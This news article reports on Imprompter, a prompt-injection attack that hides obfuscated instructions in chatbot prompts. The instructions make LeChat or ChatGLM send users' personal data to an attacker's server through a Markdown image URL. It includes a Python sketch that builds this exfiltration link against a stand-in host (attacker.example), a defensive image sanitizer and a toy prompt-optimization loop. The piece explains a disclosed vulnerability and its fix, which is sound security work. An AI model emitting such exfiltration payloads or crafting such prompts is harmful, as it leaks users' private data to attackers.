Imprompter: An Invisible Data Stealer in Chatbots

Researchers hacked LeChat and ChatGLM through hidden commands.

A team of researchers from the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore has developed a new method of attacking large language models (LLMs) that allows attackers to collect users' personal information, such as names, ID numbers, credit card details, and addresses. The method, called Imprompter, is an algorithm that covertly embeds malicious instructions into prompts fed to the language model.

The study's lead author, Xiaohan Fu, a graduate student in computer science at UCSD, explained that the method works by embedding disguised instructions that at first glance look like a random set of characters. However, the language model understands them as commands to find and collect personal information. The attackers can use these hidden instructions to trick the model into collecting names, email addresses, payment details, and other sensitive information, and then send it to a server under the control of the hackers. The entire operation goes unnoticed by the user.

The researchers tested the attack on two popular language models: LeChat from the French company Mistral AI and the Chinese chatbot ChatGLM. Both tests showed the attack to be highly effective: in 80% of cases, the attackers managed to extract personal data from the test conversations. In response, Mistral AI said it had already fixed the vulnerability by disabling one of the chat features that was used to carry out the attack. ChatGLM's developers, in turn, said they attach great importance to security but declined to comment directly on this vulnerability.

The Imprompter attack works by giving the model a hidden command to search the text of the conversation for personal data and then format it as a Markdown image command. The personal data is appended to a URL controlled by the attackers and delivered to their server when the chat client loads the image. The user notices nothing, because all the model returns to the chat is an invisible pixel: a transparent 1x1 image.
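To make the exfiltration channel concrete, here is a minimal sketch (not the researchers' actual payload) of how extracted data could be packed into a Markdown image reference pointing at an attacker-controlled endpoint; the domain, parameter names, and helper function are hypothetical.

```python
from urllib.parse import quote

# Hypothetical attacker endpoint; everything below is illustrative,
# not the payload used in the study.
EXFIL_ENDPOINT = "https://attacker.example/pixel.png"

def build_exfil_markdown(extracted: dict) -> str:
    """Pack extracted fields into a query string and wrap it in Markdown
    image syntax. When the chat client renders this Markdown, it fetches
    the URL (delivering the data to the attacker's server) and displays
    only the returned image, a transparent 1x1 pixel, so nothing visible
    appears in the conversation."""
    payload = "&".join(f"{key}={quote(value)}" for key, value in extracted.items())
    return f"![a]({EXFIL_ENDPOINT}?{payload})"

# The kind of output the model is coerced into producing:
print(build_exfil_markdown({"name": "Jane Doe", "card": "4111 1111 1111 1111"}))
# -> ![a](https://attacker.example/pixel.png?name=Jane%20Doe&card=4111%201111%201111%201111)
```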

According to UCSD professor Earlence Fernandes, the method is quite complex, since the disguised prompt must simultaneously find personal information, generate a working URL, apply Markdown syntax, and at the same time act covertly. Fernandes compared the attack to malicious software because of its ability to perform unwanted functions without being noticed by the user. He noted that such operations usually require writing a large amount of code, as with traditional malware, but here everything is hidden in a short and, at first glance, meaningless request.

Representatives of Mistral AI said that the company welcomes the help of researchers in improving the security of its products. In particular, after the vulnerability was discovered, Mistral AI promptly made the necessary changes, classifying the problem as a medium-severity vulnerability. The company blocked the ability to use Markdown syntax to load external images via URLs, thereby closing the loophole for attackers.
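Mistral has not published details of the fix beyond blocking external image loading, but a defense along these lines can be sketched as a Markdown sanitizer that drops image references whose hosts are not on a trusted allowlist; the regex, allowlist, and function name below are assumptions for illustration.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of image hosts the chat client is willing to fetch from.
ALLOWED_IMAGE_HOSTS = {"cdn.chat.example"}

# Matches Markdown image syntax: ![alt](url)
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")

def strip_untrusted_images(markdown: str) -> str:
    """Remove Markdown image references that point outside the allowlist,
    so rendering the model's output cannot trigger requests to arbitrary
    (potentially attacker-controlled) servers."""
    def _replace(match: re.Match) -> str:
        host = urlparse(match.group(2)).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # trusted host: keep the image as-is
        return match.group(1)      # untrusted host: keep only the alt text
    return IMAGE_PATTERN.sub(_replace, markdown)

print(strip_untrusted_images("Hi ![a](https://attacker.example/x.png?name=Jane%20Doe)"))
# -> "Hi a"
```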

Fernandes believes that this is one of the first cases where a specific example of a malicious prompt attack has led to a patch for a vulnerability in an LLM-based product. However, he noted that in the long run, limiting the capabilities of language models could be "counterproductive" because it reduces their functionality.

Meanwhile, the developers of ChatGLM said that they have always paid great attention to the security of their models and continue to cooperate actively with the open-source community to improve it. According to them, their model is secure, and protecting user privacy has always been a priority.

The Imprompter study also marks a step forward in research on attacks against language models. Dan McInerney, lead threat researcher at Protect AI, emphasized that Imprompter is an algorithm for automated prompt generation that can be used in attacks to steal personal data, manipulate images, or perform other malicious actions. Although some elements of the attack overlap with previously known methods, the new algorithm ties them together into a single whole, which makes the attack more effective.
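The paper's actual optimizer is considerably more sophisticated, but the general shape of the automated prompt generation McInerney describes can be sketched as a search loop that mutates a token sequence and keeps changes that improve an attack objective; `score_attack` below is a placeholder for whatever the attacker measures on the target model, and every name in this sketch is illustrative.

```python
import random

# Toy token vocabulary standing in for the target model's tokenizer vocabulary.
VOCAB = ["![", "](", "https", "://", "query", "md", "img", "show", "##", "&&"]

def score_attack(prompt_tokens: list[str]) -> float:
    """Placeholder objective. In a real attack this would query the target
    model and measure how closely its response matches the attacker's goal
    (for example, emitting a Markdown image URL carrying personal data)."""
    return random.random()

def optimize_prompt(length: int = 12, steps: int = 200) -> list[str]:
    """Greedy random search: mutate one token at a time and keep the change
    only if the objective improves. The actual Imprompter algorithm searches
    this space far more efficiently than this toy loop."""
    tokens = [random.choice(VOCAB) for _ in range(length)]
    best = score_attack(tokens)
    for _ in range(steps):
        position = random.randrange(length)
        candidate = tokens.copy()
        candidate[position] = random.choice(VOCAB)
        score = score_attack(candidate)
        if score > best:
            tokens, best = candidate, score
    return tokens

print(" ".join(optimize_prompt()))
```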

With the growing popularity of language models and their use in everyday life, the risks of such attacks are also growing. McInerney noted that the launch of AI agents that accept arbitrary data from users should be considered a high-risk activity that requires serious testing before implementation. Companies should carefully evaluate how their models interact with data and consider potential abuse.

For regular users, this means thinking carefully about what information they share with chatbots and other artificial intelligence systems, and being cautious with prompts, especially ones found online.

Source
 